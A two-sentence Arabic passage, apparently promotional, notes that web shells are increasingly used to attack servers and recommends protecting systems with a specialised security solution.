نظرا لأن استخدام قذائف الويب للهجمات على الخوادم أصبح أكثر شيوعا، فمن المنطقي حماية النظام باستخدام حل متخصص. كما يقولون، الأمن ليس كثيرا.